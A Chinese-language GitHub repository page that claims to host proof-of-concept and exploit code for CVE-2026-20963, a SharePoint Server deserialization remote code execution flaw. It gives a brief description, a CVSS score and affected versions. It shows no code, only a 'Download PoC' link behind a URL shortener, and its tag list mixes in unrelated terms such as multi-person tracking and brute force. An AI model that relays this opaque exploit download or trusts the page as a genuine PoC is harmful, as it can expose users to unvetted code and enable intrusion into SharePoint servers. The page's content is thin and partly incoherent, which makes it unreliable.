jenniferreire26/CVE-2026-20963
GitHub: jenniferreire26/CVE-2026-20963
针对 Microsoft SharePoint Server 反序列化远程代码执行漏洞(CVE-2026-20963)的概念验证与利用代码仓库。
Stars: 0 | Forks: 0
# 安全反序列化 (CVE-2026-20963)
## 概述
已识别出一个高危漏洞,编号为 CVE-2026-20963,归类于 CWE-502 (CVSS 8.8)。Microsoft Office SharePoint 中不受信任数据的反序列化漏洞允许经过授权的攻击者通过网络执行代码。
## 详细信息
- **CVE ID**: [CVE-2026-20963](https://nvd.nist.gov/vuln/detail/CVE-2026-20963)
- **发现日期**: 2026-01-13
- **发布日期**: 2026-01-13
- **严重程度**: HIGH
- **CVSS**: 8.8
- **影响**: 机密性、完整性、可用性
## 漏洞描述
Microsoft Office SharePoint 中不受信任数据的反序列化漏洞允许经过授权的攻击者通过网络执行代码。
## 受影响版本
**Microsoft Sharepoint Server:**
- 16.0.19127.20442 之前
- 2016
- 2019
## 漏洞利用
[下载 PoC](https://tinyurl.com/27wepmxf)
标签:CISA项目, CVE-2026-20963, CWE-502, Microsoft SharePoint, PoC, RCE, SharePoint Server, 反序列化漏洞, 多人体追踪, 开放策略代理, 微软漏洞, 暴力破解, 概念验证, 漏洞分析, 端点安全, 编程工具, 网络安全, 补丁管理, 路径探测, 远程代码执行, 隐私保护, 高危漏洞